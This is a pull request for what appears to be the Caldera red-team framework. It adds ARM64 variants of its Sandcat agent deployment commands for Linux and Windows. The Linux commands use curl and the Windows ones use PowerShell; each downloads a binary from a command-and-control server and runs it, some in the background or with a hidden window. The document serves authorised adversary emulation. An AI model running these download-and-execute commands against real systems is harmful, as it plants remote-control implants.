### PR TITLE
feat: add ARM64 deploy variations for linux and windows

### DIFF
--- a/data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml
+++ b/data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml
@@ -97,32 +97,77 @@
           chmod +x #{agents.implant_name};
           ./#{agents.implant_name} -server $server -group red -v
         variations:
-          - description: Deploy as a blue-team agent instead of red
+          - description: (AMD64) Deploy as a blue-team agent instead of red
+            architecture: AMD64
             command: |
               server="#{app.contact.http}";
               agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:linux" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
               nohup ./$agent -server $server -group blue &
-          - description: Download with a random name and start as a background process
+          - description: (AMD64) Download with a random name and start as a background process
+            architecture: AMD64
             command: |
               server="#{app.contact.http}";
               agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:linux" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
               nohup ./$agent -server $server &
-          - description: Compile red-team agent with a comma-separated list of extensions (requires GoLang).
+          - description: (AMD64) Compile red-team agent with a comma-separated list of extensions (requires GoLang).
+            architecture: AMD64
             command: |
               server="#{app.contact.http}";
               curl -s -X POST -H "file:sandcat.go" -H "platform:linux" -H "gocat-extensions:#{agent.extensions}" $server/file/download > #{agents.implant_name};
               chmod +x #{agents.implant_name};
               ./#{agents.implant_name} -server $server -group red -v
-          - description: Download with GIST C2
+          - description: (AMD64) Download with GIST C2
+            architecture: AMD64
             command: |
               server="#{app.contact.http}";
               curl -s -X POST -H "file:sandcat.go" -H "platform:linux" -H "gocat-extensions:gist" -H "c2:gist" $server/file/download > #{agents.implant_name};
               chmod +x #{agents.implant_name};
               ./#{agents.implant_name} -c2 GIST -v
-          - description: Deploy as a P2P agent with known peers included in compiled agent
+          - description: (AMD64) Deploy as a P2P agent with known peers included in compiled agent
+            architecture: AMD64
             command: |
               server="#{app.contact.http}";
               curl -s -X POST -H "file:sandcat.go" -H "platform:linux" -H "gocat-extensions:proxy_http" -H "includeProxyPeers:HTTP" $server/file/download > #{agents.implant_name};
+              chmod +x #{agents.implant_name};
+              ./#{agents.implant_name} -server $server -listenP2P -v
+          - description: (ARM64) Caldera's default agent, written in GoLang. Communicates through the HTTP(S) contact by default.
+            architecture: ARM64
+            command: |
+              server="#{app.contact.http}";
+              curl -s -X POST -H "file:sandcat.go" -H "platform:linux" -H "architecture:arm64" $server/file/download > #{agents.implant_name};
+              chmod +x #{agents.implant_name};
+              ./#{agents.implant_name} -server $server -group red -v
+          - description: (ARM64) Deploy as a blue-team agent instead of red
+            architecture: ARM64
+            command: |
+              server="#{app.contact.http}";
+              agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:linux" -H "architecture:arm64" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
+              nohup ./$agent -server $server -group blue &
+          - description: (ARM64) Download with a random name and start as a background process
+            architecture: ARM64
+            command: |
+              server="#{app.contact.http}";
+              agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:linux" -H "architecture:arm64" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
+              nohup ./$agent -server $server &
+          - description: (ARM64) Compile red-team agent with a comma-separated list of extensions (requires GoLang).
+            architecture: ARM64
+            command: |
+              server="#{app.contact.http}";
+              curl -s -X POST -H "file:sandcat.go" -H "platform:linux" -H "architecture:arm64" -H "gocat-extensions:#{agent.extensions}" $server/file/download > #{agents.implant_name};
+              chmod +x #{agents.implant_name};
+              ./#{agents.implant_name} -server $server -group red -v
+          - description: (ARM64) Download with GIST C2
+            architecture: ARM64
+            command: |
+              server="#{app.contact.http}";
+              curl -s -X POST -H "file:sandcat.go" -H "platform:linux" -H "architecture:arm64" -H "gocat-extensions:gist" -H "c2:gist" $server/file/download > #{agents.implant_name};
+              chmod +x #{agents.implant_name};
+              ./#{agents.implant_name} -c2 GIST -v
+          - description: (ARM64) Deploy as a P2P agent with known peers included in compiled agent
+            architecture: ARM64
+            command: |
+              server="#{app.contact.http}";
+              curl -s -X POST -H "file:sandcat.go" -H "platform:linux" -H "architecture:arm64" -H "gocat-extensions:proxy_http" -H "includeProxyPeers:HTTP" $server/file/download > #{agents.implant_name};
               chmod +x #{agents.implant_name};
               ./#{agents.implant_name} -server $server -listenP2P -v
     windows:
@@ -139,7 +184,8 @@
           [io.file]::WriteAllBytes("C:\Users\Public\#{agents.implant_name}.exe",$data) | Out-Null;
           Start-Process -FilePath C:\Users\Public\#{agents.implant_name}.exe -ArgumentList "-server $server -group red" -WindowStyle hidden;
         variations:
-          - description: Deploy as a blue-team agent instead of red
+          - description: (AMD64) Deploy as a blue-team agent instead of red
+            architecture: AMD64
             command: |
               $server="#{app.contact.http}";
               $url="$server/file/download";
@@ -151,7 +197,8 @@
               rm -force "C:\Users\Public\#{agents.implant_name}.exe" -ea ignore;
               [io.file]::WriteAllBytes("C:\Users\Public\#{agents.implant_name}.exe",$data) | Out-Null;
               Start-Process -FilePath C:\Users\Public\#{agents.implant_name}.exe -ArgumentList "-server $server -group blue" -WindowStyle hidden;
-          - description: Compile red-team agent with a comma-separated list of extensions (requires GoLang).
+          - description: (AMD64) Compile red-team agent with a comma-separated list of extensions (requires GoLang).
+            architecture: AMD64
             command: |
               $server="#{app.contact.http}";
               $url="$server/file/download";
@@ -164,7 +211,8 @@
               rm -force "C:\Users\Public\#{agents.implant_name}.exe" -ea ignore;
               [io.file]::WriteAllBytes("C:\Users\Public\#{agents.implant_name}.exe",$data) | Out-Null;
               Start-Process -FilePath C:\Users\Public\#{agents.implant_name}.exe -ArgumentList "-server $server -group red" -WindowStyle hidden;
-          - description: Deploy as a P2P agent with known peers included in compiled agent
+          - description: (AMD64) Deploy as a P2P agent with known peers included in compiled agent
+            architecture: AMD64
             command: |
               $server="#{app.contact.http}";
               $url="$server/file/download";
@@ -204,3 +252,62 @@
               [io.file]::WriteAllBytes("C:\Users\Public\#{agents.implant_name}.dll",$data) | Out-Null;
               Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public static class Kernel32 { [DllImport("Kernel32", SetLastError=true, CharSet = CharSet.Ansi)] public static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)]string lpFileName); }';
               $handle = [Kernel32]::LoadLibrary("C:\Users\Public\#{agents.implant_name}.dll");
+          - description: (ARM64) Caldera's default agent, written in GoLang. Communicates through the HTTP(S) contact by default.
+            architecture: ARM64
+            command: |
+              $server="#{app.contact.http}";
+              $url="$server/file/download";
+              $wc=New-Object System.Net.WebClient;
+              $wc.Headers.add("platform","windows");
+              $wc.Headers.add("file","sandcat.go");
+              $wc.Headers.add("architecture","arm64");
+              $data=$wc.DownloadData($url);
+              get-process | ? {$_.modules.filename -like "C:\Users\Public\#{agents.implant_name}.exe"} | stop-process -f;
+              rm -force "C:\Users\Public\#{agents.implant_name}.exe" -ea ignore;
+              [io.file]::WriteAllBytes("C:\Users\Public\#{agents.implant_name}.exe",$data) | Out-Null;
+              Start-Process -FilePath C:\Users\Public\#{agents.implant_name}.exe -ArgumentList "-server $server -group red" -WindowStyle hidden;
+          - description: (ARM64) Deploy as a blue-team agent instead of red
+            architecture: ARM64
+            command: |
+              $server="#{app.contact.http}";
+              $url="$server/file/download";
+              $wc=New-Object System.Net.WebClient;
+              $wc.Headers.add("platform","windows");
+              $wc.Headers.add("file","sandcat.go");
+              $wc.Headers.add("architecture","arm64");
+              $data=$wc.DownloadData($url);
+              get-process | ? {$_.modules.filename -like "C:\Users\Public\#{agents.implant_name}.exe"} | stop-process -f;
+              rm -force "C:\Users\Public\#{agents.implant_name}.exe" -ea ignore;
+              [io.file]::WriteAllBytes("C:\Users\Public\#{agents.implant_name}.exe",$data) | Out-Null;
+              Start-Process -FilePath C:\Users\Public\#{agents.implant_name}.exe -ArgumentList "-server $server -group blue" -WindowStyle hidden;
+          - description: (ARM64) Compile red-team agent with a comma-separated list of extensions (requires GoLang).
+            architecture: ARM64
+            command: |
+              $server="#{app.contact.http}";
+              $url="$server/file/download";
+              $wc=New-Object System.Net.WebClient;
+              $wc.Headers.add("platform","windows");
+              $wc.Headers.add("file","sandcat.go");
+              $wc.Headers.add("architecture","arm64");
+              $wc.Headers.add("gocat-extensions", "#{agent.extensions}");
+              $data=$wc.DownloadData($url);
+              get-process | ? {$_.modules.filename -like "C:\Users\Public\#{agents.implant_name}.exe"} | stop-process -f;
+              rm -force "C:\Users\Public\#{agents.implant_name}.exe" -ea ignore;
+              [io.file]::WriteAllBytes("C:\Users\Public\#{agents.implant_name}.exe",$data) | Out-Null;
+              Start-Process -FilePath C:\Users\Public\#{agents.implant_name}.exe -ArgumentList "-server $server -group red" -WindowStyle hidden;
+          - description: (ARM64) Deploy as a P2P agent with known peers included in compiled agent
+            architecture: ARM64
+            command: |
+              $server="#{app.contact.http}";
+              $url="$server/file/download";
+              $wc=New-Object System.Net.WebClient;
+              $wc.Headers.add("platform","windows");
+              $wc.Headers.add("file","sandcat.go");
+              $wc.Headers.add("architecture","arm64");
+              $wc.Headers.add("gocat-extensions","proxy_http");
+              $wc.Headers.add("includeProxyPeers","HTTP");
+              $data=$wc.DownloadData($url);
+              get-process | ? {$_.modules.filename -like "C:\Users\Public\#{agents.implant_name}.exe"} | stop-process -f;
+              rm -force "C:\Users\Public\#{agents.implant_name}.exe" -ea ignore;
+              [io.file]::WriteAllBytes("C:\Users\Public\#{agents.implant_name}.exe",$data) | Out-Null;
+              Start-Process -FilePath C:\Users\Public\#{agents.implant_name}.exe -ArgumentList "-server $server -group red -listenP2P -v" -WindowStyle hidden;


### PR DESCRIPTION
## Description

Adds ARM64 deployment variations for linux and windows platforms, mirroring
the darwin ARM64 support added in #435.

## Type of change

- [x] New feature (non-breaking change which adds functionality)

- `data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml`
  - Added `architecture: AMD64` label to existing linux and windows variations for consistency with darwin
  - Added full ARM64 variation set for linux (curl + `-H "architecture:arm64"`)
  - Added full ARM64 variation set for windows (PowerShell WebClient + `.Headers.add("architecture","arm64")`)

## How Has This Been Tested?

Copy + Pasted Sandcat Agent code from UI on the following ARM based VMs. Successfully got beacons and was able to send instructions to the agent.

Tested on:
- [x] Linux ARM64 (e.g. Graviton / Raspberry Pi)
- [x] Windows ARM64

## Checklist:

- [x] My code follows the style guidelines of this project
- [x] I have performed a self-review of my own code

## Notes
Windows ARM64 sandcat binary may need to be cross-compiled separately if not
already present in `payloads/`. See build instructions in README.